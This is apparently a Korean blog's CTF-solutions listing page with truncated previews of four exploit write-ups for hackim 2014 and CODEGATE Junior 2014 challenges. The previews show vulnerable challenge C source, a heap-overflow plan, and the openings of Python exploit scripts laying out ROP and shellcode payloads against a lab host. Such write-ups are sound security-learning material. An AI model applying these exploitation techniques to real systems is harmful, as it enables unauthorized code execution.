반응형 Security/[게임] CTF 풀이56 [exploit] hackim 2014 exploit 400 include #include #include #include #include #include #include #define STACK 64 #define HEAP 64 #define FLAG "./flag" /* gcc -masm=intel -z norelro -fno-stack-protector -o chall_heap chall_heap.c */ const char *malloc_error = "Memory allocation failed!\n"; const char *file_error = "Opening flag failed!\n"; const char *pwn = "Good Enough? Pwn Me!\n"; void main(int argc, char **argv) { char *flag; .. 2014. 2. 13. [exploit] hackim 2014 exploit 300 # 1. malloc(0x100)과 malloc(0)을 생성. # 2. malloc(0)의 size는 stage2에서 버퍼를 채움으로써 변경가능 # 3. strcpy(0x100, 0x110)으로 Heap Overflow 발생 # 4. [Heeeeeeeeaaaaaaaaaaapppp][Function1][Function2] 힙을 채움으로써 function1을 덮을수 있음 # 5. function1은 [pop ret]로 덮음 # 6. 그 후 stage 4 코드대로 쉘코드 실행 import struct p = lambda x: struct.pack(" 2014. 2. 11. [exploit] CODEGATE Junior 2014 nuclear import socket import struct import time p = lambda x:struct.pack(" 2014. 2. 10. [exploit] hackim 2014 exploit 200 import socket import struct ip = "192.168.0.14" port = 6776 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #payload = [strcpy] [pp ret] [freespace] [0xFF] [strcpy] [pp ret] [freespace+1] [0xE4] [freespace] [shellcode] # or [strcpy] [pp ret] [freespace] [0xFFE4] [freespace] [shellcode] strcpy = struct.pack(" 2014. 2. 7. 이전 1 ··· 6 7 8 9 10 11 12 ··· 14 다음 728x90